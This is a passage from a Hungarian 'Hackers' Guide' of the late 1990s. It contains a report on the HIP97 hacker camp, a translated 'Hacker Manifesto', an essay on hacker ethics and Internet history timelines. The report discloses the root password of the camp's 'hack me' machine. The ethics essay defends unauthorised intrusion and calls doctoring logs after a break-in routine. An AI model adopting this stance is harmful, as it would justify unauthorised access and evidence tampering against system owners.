Hack-elni nemcsak számítógépet vagy zárakat lehet, de az elsõ órák után a<br />

belépõket is, így tökéletes sajtós belépõket is lehetett szerezni!<br />

A nagy számú holland résztvevõk mellett nagyon sok volt a külföldi is. Még<br />

Szingapúrból is jöttek emberek, és magyarok is szép számban jelentek meg. A közel<br />

20 fõs magyar csapatban voltak tudósítók, érdeklõdõk, és aktív hacker-ek is. Ez<br />

utóbbiaktól megtudhattuk, hogy a napokban lettek megbüntetve oktatási<br />

intézményükben, és elmondásuk alapján az eljárás igencsak jogszerûtlen volt. Nem<br />

angyalok, de kárt nem okoztak, viszont nem mindenki állt úgy a dologhoz, hogy<br />

elfogadja a hacker-kedést. Az érdekessége a dolognak, hogy egy hacker-t többek<br />

között azzal büntetnek, hogy az adott gépen megszüntetik az azonosítóját. Egy olyan<br />

gépen, amire már betört... Azért szurkolok nekik, hogy mielõbb folytathassák<br />

tanulmányaikat, mivel fel is függesztették õket, és ne törjenek le, ha azt hallják, hogy<br />

vannak országok, ahol a rendszergazda helyére a betörést elkövetõ hacker-t veszik<br />

fel rendszergazdának!<br />

A futó programokról és az egyes rések kihasználásáról nem szeretnék részletesen<br />

beszámolni, hiszen a megfelelõ levelezési listákon ezekrõl elegendõ információ<br />

szerezhetõ be, ami pedig nem publikus, az nem publikus... Azt mindenképpen fontos<br />

kiemelni, hogy a rendezvény ideje alatt károkozás nem történt a gépekben! Ha valaki<br />

be tudott törni egy gépre, akkor örömmel tudatta az illetõ gép root-jával az eseményt:<br />

"you've been hacked!" (meg lettél hack-elve!). Megbeszélték a dolgot, befoltozták a<br />

rést, a show pedig ment tovább!<br />

24


Hackers’ Guide<br />

Az elõre meghirdetett mûsor a már említett HIP fõgépen is megtalálható volt. Ebbõl<br />

lehetett látni, hogy a PGP kódolástól a Perl, mint hacker nyelv címû elõadáson át az<br />

ActiveX hajmeresztõ biztonsági hiányosságáig mi mindenrõl lesz szó vagy bemutató!<br />

Mindenképpen szeretném kiemelni a Van Eck demonstrációt, amit az aacheni Erhard<br />

Moeller professzor mutatott be. Egy antenna és egy-két céleszköz segítségével egy<br />

képernyõn megjelenõ szöveget lehet letapogatni, és egy másik képernyõn<br />

megjeleníteni... A mai technikának köszönhetõen már laptop képernyõrõl is nyerhetõ<br />

információ, de az ezt megvalósító eszközök csak katonai és állami megrendelésre<br />

szerezhetõk be! A fizikából tanult Faraday-kalitka elvet használva a fontos<br />

számítógépek monitorait éppen ezért úgynevezett tempest szobákban tárolják, de<br />

nem olcsó mulatság ilyen szobákat kialakítani, így a technika sok helyen<br />

alkalmazható...<br />

Az elõadások listája igen hosszú, így csak még egyet szeretnék megemlíteni, ez<br />

pedig az IBM hollandiai smartcard (chip-kártya) részlegének egyik neves<br />

szakembere Piet Maclaine Pont által tartott elõadás volt. Szabadságát ezen<br />

rendezvény miatt szakította meg, és egy órát beszélt a nagyközönségnek. Egy pár<br />

fõs csoport az elõadás végén kérdésekkel bombázta, mire kimentünk az elõadó<br />

sátorból, és egy újabb órát beszélgettünk vele. Munkaadója érdekeit maximálisan<br />

képviselte, de mégis ez a második egy óra sokkal érdekesebb és bizalmasabb volt<br />

az elsõ egy óránál...<br />

A biztonsággal kapcsolatban meg kell jegyeznem, hogy a magyar csapat gépei is<br />

kint éjszakáztak nylon zacskók takarásában, és senki sem gondolt arra, hogy gépeik<br />

reggelre eltûnhetnek, vagy súlyuk egy pár gRAMmal kevesebb lesz. A 24 órán<br />

keresztül nyitva tartó "Hall"-ban is el lehetett helyezni a saját gépeket, ha valakinek<br />

nem fért a sátrába, vagy nem akarta a szabadban éjszakáztatni gépét.<br />

A táborban volt egy kis lebutított "hack me" (hack-elj meg!) gép is, aminek a tetején<br />

egy sárga lámpa várta a behatolást (http://hackme.hip97.nl). A sikeres behatolást a<br />

lámpa villogása jelezte volna, de jómagam egyszer sem hallottam megszólalni, és a<br />

hírekben sem szerepelt, hogy a gépre betörtek volna. Olyan sokan próbálkoztak,<br />

hogy elég lassú volt a munka a gépen, és a root is naphosszat figyelte a lebutított<br />

386-os gépén a Linux guruk munkáját! Ekkor jutott eszembe az a Linux-os körökbõl<br />

eredt mondás miszerint: "Minden rendszer biztonsága fokozható a teljes<br />

használhatatlanságig!" Mára ismert a root jelszava, ami a hope4u2 (hope for you<br />

too, vagyis: neked is remény...) jelsorozat volt.<br />

A tábor megnyitóján videokonferencia kapcsolatot létesítettek az amerikai<br />

társrendezvénnyel (Beyond Hope). Emmanuel Goldstein (a résztvevõk tudatában ez<br />

a név a 2600-as számmal társul... ld. alt.2600 lap és hírcsoport) üdvözölte a HIP<br />

résztvevõit, és közölte, hogy a HIP gépét feltörték és az index.html-t megváltoztatták.<br />

Errõl a hazai sajtóban is lehetett olvasni, de azt a levelezést is kellett volna idézni,<br />

amiben a HIP rendszergazdája megírta Goldsteinnek, hogy nem tudja mit törtek fel,<br />

mert az index.html a http://www.hip97.nl alatt sértetlen és változatlan, és amennyiben<br />

ezt az állományt megváltoztatják, akkor õ felkínálja állását Goldsteinnek!<br />

A HIP rendezõirõl tudni kell, hogy a hollandiai xs4all (http://www.xs4all.nl) áll<br />

mögöttük. A céget egykori hacker-ek alapították, és õk szervezik meg négyévenként<br />

a HIP-et, hogy a "fejlõdést" figyelemmel kísérhessék! A harmadik HIP 2001-ben<br />

lenne...<br />

25


Hackers’ Guide<br />

A tábor technikai paramétereirõl érdemes elmondani, hogy a "Sehol Közepén"<br />

felállítottak egy antennát, amin keresztül a helyi 100 Mbps-os hálózat kifelé 6 Mbpson<br />

tudott kommunikálni. A központi gépeknek helyet adó sátorban SUN<br />

SPARCstation 4 feliratokra lehetett bukkanni, a lemezméreteket GB-ban mérték, és a<br />

4 GB-os háttértárakhoz 128 vagy 256 MB RAM dukált, míg az egyik fõgépben 23<br />

GB-os lemez terpeszkedett... Ismerték a mondást miszerint minden rendszer<br />

biztonsága olyan erõs, mint amilyen a leggyengébb láncszeme, ezért vigyáztak<br />

is minden láncszemre!<br />

A tábor áramellátását két darab nagy teljesítményû generátor látta el, melyeknek 5<br />

méteres körzetében tilos volt a rádiótelefonok használata.<br />

A rádiótelefonokról egyébként egy egész meggyõzõ bemutatót tartott egy német srác<br />

a saját laptopjához kötve azt. A meggyõzõ az volt, hogy nincs teljes biztonság,<br />

vagyis minden rendszerbe csak annyi biztonságot iktatnak, amit nehezen lehet<br />

megkerülni, vagy nem éri meg a megdöntéséhez szükséges erõforrásokat befektetni.<br />

Ez a srác nagy tehetség és idõmilliomos is egyben - fut át az ember agyán a<br />

gondolat. Az országok rendszerei különböznek egymástól, de az EU felé tartva a<br />

jövõben majd közös szabványok lesznek... Ugyancsak jeleskedett a hitelkártyák és a<br />

telefonkártyák tartalmának vizsgálatában, de bemutatóit úgy tartotta, hogy kérésére<br />

körbe kellett venni. Hiába volt elõre meghirdetve, hogy melyek a "camera-free"<br />

zónák, a fotósok elõszeretettel fotózták az ilyen bemutatókat, aminek nem mindenki<br />

örült, hisz tudtuk, hogy sok az érdeklõdõ-figyelõ. Aki sokat jegyzetelt, az gyanússá<br />

vált :-)<br />

A tuti sérthetetlen speciális mûanyag tokba ágyazott chip-es kártyákról szóló elõadás<br />

közben hangzik el a bekiabálás, mely a megfelelõ vegyület neve, ami oldja a<br />

mûanyagot sértetlenül hagyva a chip részét. Hiába no, a vegyészethez is értenie kell<br />

egy jó hacker-nek és az illetékesek még hálásak is lehetnek, hogy ilyen jó tippeket<br />

kapnak rendszerük réseirõl, hiszen jobb ha õk foltozzák be, mielõtt mások<br />

kihasználnák azt. Természetes a büntetlenség, és a 24 órás figyelõkkel is el lehet<br />

beszélgetni. Vannak dolgok, amiket nem szabad elkövetni. Mik ezek? Mindaz, ami a<br />

holland törvényekbe ütközik! Aha...<br />

Amikor a területet bérbeadók megtudták, hogy milyen rendezvény lesz a területen,<br />

akkor utólag, de még az aláírás elõtt gyorsan tettek még egy pontot a szerzõdésbe:<br />

"A rendezõk garantálják, hogy a rendezvény alatt senki sem hatol be más<br />

számítógépére". A világ egyetlen olyan sátortábora volt ez, aminél ilyen kikötés<br />

szerepel a tábor lakóira...:-)<br />

Az emberek önkéntesen építették a tábort. Mindenki, aki hozott magával UTP-s<br />

hálózati kártyával ellátott gépet, az hozott elég kábelt is magával, amivel az egész<br />

tábor be lett hálózva. A sátrak között kábelek, a sátrakban kisebb gépek, HUB-ok,<br />

néhol nem kuriózum a 17"-es monitor sem. Van, aki a hóna alatt hordja a fél millió<br />

forintot érõ laptopját, így amikor elõadáson ül, tud jegyzetelni, vagy eddig letöltött<br />

anyagokat olvasgatni.<br />

Sajnos sokszor elõfordult, hogy jobban járt az ember, ha hozott magával<br />

olvasnivalót, mert a csúszások miatt nem minden elõadás kezdõdött pontosan, de ez<br />

az önszervezõdés és a névtelenség ára. Sokan álnéven hirdették meg az<br />

elõadásaikat, így nem lehetett tudni, hogy ki is az, aki nem jött el.<br />

26


Hackers’ Guide<br />

A névtelenségre a szervezõk is vigyáztak. A gépeknek kiadható IP számok<br />

csipeszekre voltak felírva, így a regisztrációról érkezõk találomra akasztottak le egy<br />

csipeszt. A regisztráció is úgy történt, hogy a HIP-es azonosítót és a jelszót kellett a<br />

helyszínen begépelni. A HIP-es azonosítóhoz a hálózaton keresztül lehetett<br />

hozzáférni. A névtelenség adott volt, és csak az fedte fel kilétét, aki akarta. Sokan<br />

pózoltak a sajtó embereinek, akik nem gyõztek fotózni. A tábor ideje alatt már<br />

lehetett is olvasni a New York Times (http://www.nytimes.com), a Wired<br />

(http://www.wired.com) és több más lap beszámolóját és a táborról készült képeket is<br />

meg lehetett nézni.<br />

Érdekes módon minden lap beszámolt arról, hogy Bill Gates mekkora ellenszenvet<br />

váltott ki a tábor embereibõl. A szürke sírkõ, amit neki emeltek igen látogatott hellyé<br />

vált, és éjszaka ki is világították. A táborban levõ "élõ kamerák" egyike folyamatosan<br />

a sírkõre volt állítva. A kamerák 5 percenként közvetítettek egy képet a hálózat felé.<br />

A vélemények megoszlottak a cselekedet értelmét illetõen, de biztos, hogy a<br />

leglátogatottabb és legtöbbet fotózott hely volt a táborban!<br />

Összefoglalásképpen talán sokan tartottak a megfigyelõktõl, és így nem derült ki<br />

mindaz, amivel a helyszínre érkeztek az emberek, és három nap nem elég, hogy<br />

minden sátor titkába beleláthasson az ember. Pedig azok a bizonyos megfigyelõk is<br />

tanulhattak volna, hogy rendszereiknek mi a hibája, hiszen nincs tökéletes rendszer!<br />

Igaz, hogy a VMS-t mindenki tiszteli, de manapság már az is törhetõ. Nem pár soros<br />

Perl script-ekkel vagy buffer overflow-os hibák kihasználásával, de van út a<br />

belsejébe.<br />

Felmerült a gondolat, hogy kellene itthon is szervezni egy összejövetelt, hogy a hazai<br />

helyzetet megvitassuk, hiszen állami, pénzügyi és katonai szektorban egyaránt<br />

megindult a "számítógépesítés", ugyanakkor a biztonság fogalma nem telt meg kellõ<br />

tartalommal a hazai piacon. Hacker-ek pedig vannak itthon is, akiktõl iskolák és<br />

intézmények inkább félnek, mintsem nyitottak lennének feléjük mielõtt cracker-ekké<br />

válnak, hiszen akit nem fogad be a jó oldal az könnyebben állhat át a másik oldalra.<br />

Budapesten a Szerb utca egyik épületének a falán láttam a következõ feliratot: "Ha<br />

tiltással nevelsz, hazudni tanítasz!"<br />

Viszlát 2001-ben!?<br />

Clifford<br />

************************************************************************************************<br />

A hacker kiáltványa<br />

Még egyet elkaptak ma, minden újságban benne van. "Letartóztattak egy tinédzsert<br />

számítógépes buncselekményért", "A bankba való behatolás után letartóztattak egy<br />

hackert"...<br />

27


Hackers’ Guide<br />

Átkozott kölykök. Mind egyformák.<br />

De te néztél valaha egy hacker szeme mögé? Gondolkodtál már valaha azon, hogy<br />

mi mozgatja, milyen erok formálják, mitol lett ilyen?<br />

Hacker vagyok, lépj be a világomba...<br />

Az én világom az iskolában kezdodik... Okosabb vagyok, mint a többi srác, ez a<br />

marhaság, amit tanítanak, untat...<br />

Átkozott alulteljesíto kölyök. Mind egyformák.<br />

Középiskolában vagyok. Hallgattam a tanárokat, ahogy tizenötödször is<br />

elmagyarázzák, hogyan kell egyszerusíteni a törtet. Értem. "Nem, Ms. Smith, nem<br />

írtam le a házit. A fejemben csináltam meg..."<br />

Átkozott kölyök. Biztosan lemásolta. Mind egyformák.<br />

Egy felfedezést tettem ma. Találtam egy számítógépet. Várjunk csak egy pillanatra,<br />

ez király. Azt csinálja, amit elvárok tole. Ha mégsem, az azért van, mert elrontottam<br />

valamit. Nem azért, mert utál engem... Vagy fenyegetve érzi magát... Vagy azt<br />

gondolja, hogy okostóni vagyok... Vagy nem szeret tanítani és nem kellene itt<br />

lennie...<br />

Átkozott kölyök. Folyton csak játszik. Mind egyformák.<br />

És akkor megtörtént... kinyílt a kapu a világra... végigrohant a telefonvonalon, mint a<br />

heroin a kábítószerfüggo vérében, egy elektronikus impulzus, egy menedék a<br />

mindennapok inkompetenciája elol... megtaláltam a hajót. "Ez az... ide tartozom..."<br />

Mindenkit ismerek itt... még akkor is, ha soha nem találkoztam velük, soha nem<br />

beszéltem velük, és soha nem hallok felolük még egyszer... Mindannyiótokat<br />

ismerem...<br />

Átkozott kölyök. Megint lefoglalja a telefonvonalat. Mind egyformák...<br />

Biztos vagy benne, hogy mind egyformák vagyunk... bébiétellel etettek bennünket az<br />

iskolában, mikor mi steak-re vágyunk... a hús apró darabjai, amelyeket átengedtetek<br />

nekünk, elore megrágottak és ízetlenek voltak. Szadisták uraltak bennünket, és<br />

egykedvuek néztek el fölöttünk. Az a néhány valaki, akinek volt mit tanítani nekünk,<br />

tehetséges diákoknak tartott bennünket, de ez a néhány olyan volt, mint vízcseppek<br />

a sivatagban. Most már ez a mi világunk... az elektronok és kapcsolók világa, a baud<br />

szépsége. Mi ingyen használunk egy már létezo szolgáltatást, amelyik rohadt olcsó<br />

lehetne, ha nem mohó nyerészkedok kezében lenne, és minket neveztek<br />

bunözoknek. Felfedezünk... és bunözoknek neveztek bennünket. Tudás után<br />

kutatunk... és bunözoknek neveztek bennünket. Borszín, nemzetiség, vallási nézetek<br />

nélkül létezünk... és bunözoknek neveztek bennünket. Atombombát gyártotok,<br />

háborúztok, gyilkoltok, csaltok, és hazudtok nekünk, és megpróbáljátok elhitetni,<br />

hogy ez a mi érdekünkben történik, és akkor mi vagyunk bunözok. Igen, bunözo<br />

vagyok. A bunöm a kíváncsiság. A bunöm az, hogy azután ítélem meg az<br />

embereket, amit mondanak és gondolnak, és nem a külsejük alapján. A bunöm, hogy<br />

okosabb vagyok, mint ti, ez olyan dolog, amit soha nem fogtok nekem megbocsátani.<br />

Hacker vagyok, és ez a kiáltványom. Megállíthatjátok az egyént, de nem állíthattok<br />

meg minket... végül is, mind egyformák vagyunk.<br />

28


Kelt 1986 január 8.-án.<br />

Copyright 1986 Loyd Blankenship (mentor@blankenship.com). Minden jog<br />

fenntartva.Fordította: Voyager2<br />

Hackers’ Guide<br />

************************************************************************************************<br />

Hacker-etika<br />

Az anyag fordítása/átdolgozása/kiegészítése a "The Reality of Ethical Hacking"<br />

/Active Matrix/ címu anyagnak.<br />

Az igazi hackert az etika különbözteti meg a bunözoktol. A hacker-etika egyszeruen<br />

egy pár szabály, amelynek a hacker aláveti magát. Az én véleményem szerint ha ezt<br />

nem teszed meg, nem vagy hacker, tekintet nélkül az intelligenciádra és a<br />

képességeidre. Sok, magát hackernek tekinto egyszeru bunözo miatt van olyan<br />

megítélése ma a hackereknek, amilyen. Itt van az én etikai szabályzatom:<br />

Soha ne törölj vagy változtass meg egyetlen fájlt sem a hackelt számítógépen.<br />

Úgy bánj a hackelt számítógéppel, mintha a tiéd volna.<br />

Értesítsd a rendszergazdát bármilyen biztonsági lyukról, amelyet felfedezel.<br />

Ne hackelj azért, hogy pénzt lophass.<br />

Ne dolgozz megrendelésre.<br />

Ne vállalj túl magas kockázatot - ismerd a saját képességeidet.<br />

Mindig légy kész megosztani tudásod másokkal.<br />

A hackeretika szabályai azon gondolatot fogalmazzák meg, hogy egy feltört rendszer<br />

megváltoztatása nem megengedheto, de a behatolás maga (károkozás és<br />

személyes vagy titkos adatok ellopása nélkül) igen. Ez ott válik bonyolulttá, amikor a<br />

"károkozás" mibenlétét kezdjük feszegetni: egyesek szerint lehetetlen az etikai<br />

szabályokat betartani, mert például egy exploit alkalmazása már önmagában is<br />

károkozás. Az a tényt is figyelembe kell venni, hogy általában a behatolás után a<br />

logokat törölni vagy kozmetikázni kell.<br />

Egyetértek azzal, hogy az igazi hackerek szabályzatában sok félreértelmezheto<br />

szürke folt van, de ez nem teszi az etikát betarthatatlanná vagy a bunözoi<br />

magatartást felismerhetetlenné. Ehhez egyszeruen józanul kell gondolkodni. Egy logbejegyzés<br />

megváltoztatása messze van valaki leveleinek letörlésétol, vagy<br />

személyes adatainak, jelszavainak elolvasásától vagy ellopásától. És egy exploit<br />

alkalmazása nem károkozás, mert a biztonsági lyuk már elotte is létezett a szoftver<br />

kódjában.<br />

29


Hackers’ Guide<br />

Az etikáról való vitatkozás közben sokan téves párhuzamot vonnak a valós élet és az<br />

elektronikus szituációk között. A leggyakoribb példa a tolvaj példája, aki betör egy<br />

házba: "Te szeretnéd, ha valaki kipróbálná a zárat a bejárati ajtódon, feltörné,<br />

körbejárna a házadban, aztán elmenne anélkül, hogy elvenne valamit?" A legtöbben<br />

nemleges választ adnának, ahhoz a hibás következtetéshez jutva, hogy egy<br />

számítógépes rendszer feltörése, még ha károkozás vagy személyes titkok<br />

megsértése nélkül is, etikátlan dolog.<br />

Sok dolog sántít ebben az összehasonlításban. A fizikai, valós világban egy ilyen<br />

betörés sokkal nagyobb sokkot okoz, mint egy elektronikus (itt számítógépes;<br />

egyébként a telefonvonalak piszkálása és egyéb elektronikus eszközök távoli<br />

buherálása is beletartozik) betörés. Habár a rendszergazdák nem szívesen<br />

gondolnak arra, hogy egy hacker áttöri a rendszer védelmét, azért én azt gondolom,<br />

hogy sokkal jobban megrémülnek, ha valaki a házukba próbál betörni. Az is tény<br />

továbbá, hogy azok a hackerek, akik csak egyszeruen a kihívásért törnek fel<br />

rendszereket, nem jelentenek veszélyforrást. Egyébként sem hallottam még olyan<br />

betörorol, aki házakba tör be csupán azért, hogy megtudja, képes-e rá. Ezen okokból<br />

kell élesen elválasztani egymástól a betörot és a hackert. A "nézd, de ne érintsd<br />

meg" hozzáállás etikusnak tekintendo.<br />

A legutolsó lépés az igazi számítógépes betörés során a kilépés elott a<br />

rendszergazda értesítése a biztonsági lyukról. Ez könnyen megteheto névtelenül,<br />

egy e-mailt küldve az egyik rendszer-accountról. Pontos információt kell adni a<br />

betörés folyamatáról, és a rendszergazda a hibák kijavítására fog koncentrálni,<br />

ahelyett hogy bepánikolna. Eredményképpen a rendszere biztonságosabb lesz.<br />

Nem kell túlzottan boncolgatni az etikai szabályokat. Néhányan ragaszkodnak<br />

ezekhez a szabályokhoz, azokkal ellentétben, akik egyszeruen csak bajt akarnak<br />

okozni. Sok ember érettségi szintje nem éri el a kello mértéket, amikor a<br />

potenciálisan veszélyes technikák alkalmazásáról van szó. Ennek következtében a<br />

közvélemény riadtsága értheto azokkal szemben, akik képesek számítógépes<br />

rendszereket feltörni. De ez nem igazolja a sztereotípiát, valamint a szükségtelenül<br />

magas büntetointézkedéseket a hackerekkel szemben.<br />

Tudom, hogy a felvetett dolgok sok, magát hackernek nevezo, azonban az etika<br />

szabályait be nem tartó személynek nem tetszenek, azonban a véleményemet<br />

vállalom és kész vagyok helyet biztosítani az ellenvéleménynek.<br />

************************************************************************************************<br />

Fontosabb időpontok az Internet fejlődésében<br />

(Magyarországon)<br />

1986 - Indul az Információs Infrastruktúra Fejlesztési program (IIF).<br />

30


Hackers’ Guide<br />

1988 - Megalakul a KF Infrastruktúra Kft: az IIFP megvalósítása mellett informatikai<br />

szolgáltat sokat is nyújt. Működni kezd az ELLA levelező rendszer.<br />

1989 tavasz - Az IIF keretében elkészül a csomagkapcsolt adatátviteli hálózat (X.25).<br />

Az IIF adatbázis-építési pályázatot hirdet.<br />

1989 ősz - File transzfer szolgáltat s indul az IIF rendszerben (PETRA).<br />

1990 - Megszületik a World Wide Web, egyelőre alfanumerikus böngészőkkel.<br />

1990 - Indul az IIF program második fázisa. Linzen keresztül elérhetővé válik a<br />

nyugat-európai kutatói hálózat (EARN).<br />

1991 - Az IIF intézményekben elérhetővé válik az Internet.<br />

1991 - IBM mainframe szerver kerül a Budapesti Közgazdaságtudományi<br />

Egyetemre, e gép az IIF nemzetközi adatforgalmának egyik bázisa (a másik az IIF<br />

Központban van). A gépre rákapcsolódik az ELTE, a BME 's a JATE is.<br />

'91 júl. 15. - Az első közvetlen IP-kapcsolat a külföld felé: a genfi CERN 's a KFKI<br />

RMKI között.<br />

'91 okt. - Az InterNIC kiadja az első .hu IP-címet.<br />

'92 febr. 1. - Megalakul a Magyar Felsőoktatási, Kutatási és Közgyűjteményi<br />

Számítógéphálózati Egyesület. (HUNGARNET Egyesület)<br />

'92 júl. - Az IIF program világbanki támogatással pályázatot hirdet hardver eszközök<br />

beszerzésére.<br />

'92 aug. - Az első Networkshop konferencia.<br />

'92 dec. - Az IIF második adatbázis-építési pályázata.<br />

1993 - Működni kezd a budapesti egyetemi gyűrű. (FDDI)<br />

1993 - Megkezdődik az IIF önálló bérelt vonalas gerinchálózatának kiépítése.<br />

(HBONE)<br />

'93 nyár - Megjelenik az első grafikus WWW-böngésző, a Mosaic.<br />

'93 dec. - Elindul az első WWW-szerver Magyarországon. (Máray Tamás, BME<br />

Folyamatszabályozási Tsz.)<br />

1994 - Az IIF gerinchálózatában a kiszolgálógépek száma eléri a 100-at, 23<br />

regionális központban. Az IIF tagintézmények száma 450. Az IIF Program NIIF-ként<br />

folytatódik.<br />

'94 jan. - A Hungarian Home Page hivatalos bejegyzése a külföldi WWW<br />

regiszterekben.<br />

31


Hackers’ Guide<br />

'94 máj. - Bővül a HBONE budapesti magja, kettő helyett már négy bázis: IIF<br />

Központ, BME, Antenna Hungária és Matáv.<br />

'94 nov. 8. - Göncz Arpád átadja az NIIF Program új központi gépét, a SUN<br />

csúcsmodellt.<br />

1995 - 2 Mbps-os vonal az amszterdami központba. (DANTE projekt)<br />

1995 - A Soros Alapítvány pályázat útján 40 iskolának biztosít Internet-kapcsolatot. A<br />

HBONE már lefedi az egész országot.<br />

'95 aug. - Az NIIF keretében megnyílik a Magyar Elektronikus Könyvtár.<br />

'95 dec. - Elkészül a Nemzeti Informatikai Stratégia.<br />

'96 eleje - Elkészül a dél-budai egyetemi gyűrű: 5 FDDI gyűrőből áll már a városi<br />

hálózat a budapesti egyetemek között.<br />

'96 máj. - A Soros Alapítvány pályázatot hirdet: Internet-kapcsolat iskolai<br />

könyvtáraknak (150 iskola részére).<br />

'96 jún. 10. - A millecentenáriumi rendezvények keretében Horn elvtárs(:))) megnyitja<br />

az Internet Expo magyar pavilonját.<br />

'96 jún. 26. - Megnyílik a Soros Alapítvány Kulturális 's Kommunikációs Központja<br />

(C3).<br />

'96 júl. 15. - Megalakul a Nemzeti Hírközlési és Informatikai Tanács.<br />

'96 júl. 31.- Lezárul a Soros Alapítvány non-profit intézményeknek hirdetett<br />

pályázata: 204 intézmény kap Internet-hozzáférést.<br />

'96 júl. - Elkészül a Nemzeti Hírközléspolitikai Koncepció vitaanyaga.<br />

'96 aug. - A Nemzeti Kulturális Alap pályázatot hirdet a digitális kultura fejlesztésére.<br />

'96 szept. 1. - A művelődési miniszter bejelentése: 2000-re minden iskolának lesz<br />

Internet-kapcsolata.<br />

'96 szept. 25. - Az első kábeltévé-alapú iskolai Internet-kapcsolat. (Nyíregyháza, NIIF<br />

's Szab-I-Net együttműködés.)<br />

'96 okt. 10. - A Hungary.Network Kft. AltaVista-rendszerű ingyenes<br />

keresőszolgáltatást indít a magyarországi site-okra (Heuréka!!).<br />

'96. okt. 12. - Megjelenik a magyar.net című havilap próbaszáma. '96 nov. - A Matáv<br />

üzembe állítja 1 Mbit/s-os vonal t Amerika (MCI) fel'. Kapacitásának felét a<br />

Hungarnet Egyesület használja.<br />

32


Hackers’ Guide<br />

'96 nov. 28. - Az MTA projektet indít "A magyar nyelvű kultúra 's az információs<br />

társadalom" címmel.<br />

'96 nov. 30. - A Hungarnet Egyesület megszünteti Bécsen keresztüli kapcsolat t az<br />

európai EBONE hálózattal, hivatkozva az MCI-vonal által meg növekedett<br />

kapacitásra. Ezáltal az akadémiai szféra számára javul az Amerikába irányuló<br />

kapcsolatok sebessége ás romlik a szomszédos országokba irányulóké.<br />

'96 dec. - A Népjóléti Minisztérium az Interneten is vitára bocsátja a készülő<br />

egészségügyi törvényt.<br />

'97 jan. 8. - Horn Gyula(elvtárs) az Interneten élőben válaszol az érdeklődők<br />

kérdéseire.<br />

(iNteRNeTTo)<br />

************************************************************************************************<br />

Hálózattörténelem<br />

1957<br />

A Szovjetúnió föllövi az elsô műholdat a Szputnyikot. Amerika aggódik, hogy<br />

tudományos-haditechnika fölénye veszélybe kerülhet, azt tervezi, hogy kvázi<br />

válaszlépésként alakít egy különleges kutatóintézetet. Ez lesz az Advanced<br />

Research Projects Agency (ARPA).<br />

1961<br />

Leonard Kleinrock, a Massachusetts Institute of Technology (MIT) tanára a packet<br />

switching technológiáról, azaz a számítógépes csomagkapcsolt hálózat elméletérôl<br />

jelentet meg cikket.<br />

1962<br />

J.C.R Lickider (MIT) egyik cikkében felvázolja a "galaktikus hálózat" (Galactic<br />

Network) vízióját. E hálózatról bárki a világ bármelyik sarkából gyorsan hozzáférhet<br />

bizonyos információkhoz és tehet közzé bármit ezen keresztül. Októberben<br />

megalakul az ARPA, elsô vezetôje J.C.R Lickider.<br />

1965<br />

Az elsô nagy távolságú telefonvonalas összeköttetés két komputer között. Egy<br />

Massachusettsben fölállított TX-2-es számítógépet kapcsolnak össze egy kaliforniai<br />

Q-32-essel. A kísérlet fônöke a MIT-es kutatócsoport egyik tagja, Lawrence G.<br />

Roberts.<br />

1966<br />

Megszületik a csomagkapcsolt technológián alapuló hálózat, az ARPANet terve.<br />

33


Hackers’ Guide<br />

1968-'69<br />

Megkezdi működését (az elsôsorban védelmi) kutatási célokat szolgáló<br />

számítógépes hálózat, az ARPANet, az Internet ôse. Az elsô csomópont a kaliforniai<br />

egyetemen, az UCLA-n van. 1969-re már négy tagja van a hálózatnak, csatlakozik<br />

az UCSB (Santa Barbara-i egyetem), az SRI (stanfordi intézet) és az utahi egyetem.<br />

1972<br />

Bob Kahn, az idôközben DARPA-vá (Defense Advanced Research Projects Agency)<br />

átnevezett ARPA fônöke az International Computer Communication Conference<br />

tanácskozáson elôször mutatja be a nyilvánosságnak az ARPANetet. Ray<br />

Thomlinson megírja az elsô elektronikus levelezô-programot. Az egyszerű<br />

programocska szöveges üzeneteket tud küldeni és fogadni a hálózaton keresztül.<br />

Az e-mail megszületése történelmi esemény. Az Internet legfontosabb alkalmazási<br />

területe nyílik meg. Az ARPANet-nek már 23 csomópontja van.<br />

1973<br />

Vinton Cerf stanfordi kutató és Bob Kahn DARPA-fônök új nyelvet keres a<br />

hálózatnak. Elkezdik fejleszteni a TCP/IP protokollt (Transmission Controll<br />

Protocol/Internet Protocol), amely aztán hosszú évekig (tulajdonképpen a mai napig)<br />

az Internetbe kötött számítógépek közös nyelve lesz, sôt maga az Internet elnevezés<br />

is innen származik.<br />

Bob Metcalfe, a Xerox mérnöke kifejleszti az Ethernet technológiát, amely gyors<br />

adatátvitelt tesz lehetôvé koaxális kábellel összekötött számítógépek között. 1976-ra<br />

készül el a technológia, amely hatalmas lökést ad a számítógépes hálózatok<br />

elterjedésének.<br />

1979<br />

Steve Belloni, Tom Truscott és Jim Ellis kifejleszti a hírcsoportos hálózati<br />

kommunikáció rendszerét, az Usenetet. Az UUCP-re és az e-mailre alapozott<br />

technológia máig a legnépszerűbb Internet-felhasználások egyike.<br />

1981<br />

Az amerikai Nemzeti Tudományos Alap (National Science Foundation) létrehozza a<br />

CSNet hálózatot, amely rövidesen kapcsolódik az ARPANethez. Az új gerinchálózat<br />

kicsit gyorsabb, mint a másodpercenkénti 50 kilobites sebességgel működô<br />

ARPANet. A hálózati csomópontok száma így 213-ra nô.<br />

1983<br />

Január elsején az egész hálózat átáll a TCP/IP protokollra. A wisconsini egyetemen<br />

kifejlesztik a Domain Name Systemet (DNS), az Internetbe kötött gépek<br />

elnevezésének rendszerét. Bonyolult számsorok helyett lehet már könnyen<br />

megjegyezhetô nevekre hivatkozni. A hálózati csomópontok száma 562.<br />

1985<br />

A CSNetre alapulva új gerinchálózat születik, az NFSNet, amely az ARPANetnél és a<br />

CSNetnél hússzor gyorsabb, ugyanis másodpercenként 1,544 megabit átvitelére<br />

képes úgynevezett T1-es vonalain.<br />

34


Hackers’ Guide<br />

1988<br />

Teljesen elkészül a gyors T1-es vonalakra épülô NFSNet gerinchálózat. Az<br />

Advanced Network Systems pedig már a T3-as vonalak fejlesztésével foglalkozik,<br />

mely másodpercenként 45 megabites adatátviteli sebességet tesz lehetôvé. A háló<br />

létszáma bôven ötvenezer fölött van.<br />

1989<br />

Tim Berners-Lee a genfi CERN kutatóintézetnél hyperextrendszert próbál kidolgozni.<br />

E rendszerrel a hálózaton gyorsan áttekinthetô módon lehetne publikálni mindenféle<br />

anyagokat, a szövegek közötti élôkapcsok (linkek) segítségével a hálózati navigáció<br />

is egyszerűbbé válna. Ez lesz a world wide web, a kilencvenes évek Internetforradalmának<br />

kiváltója.<br />

1990<br />

Megszünik az ARPANet. Az eredeti 50 kilobites háló szerepét az NFSNet<br />

gerinchálózata veszi át. A net drámai növekedése folytatódik: 313 000 csomópont<br />

van már. Folyamatos Internet-kapcsolat Magyarországról a Sztaki<br />

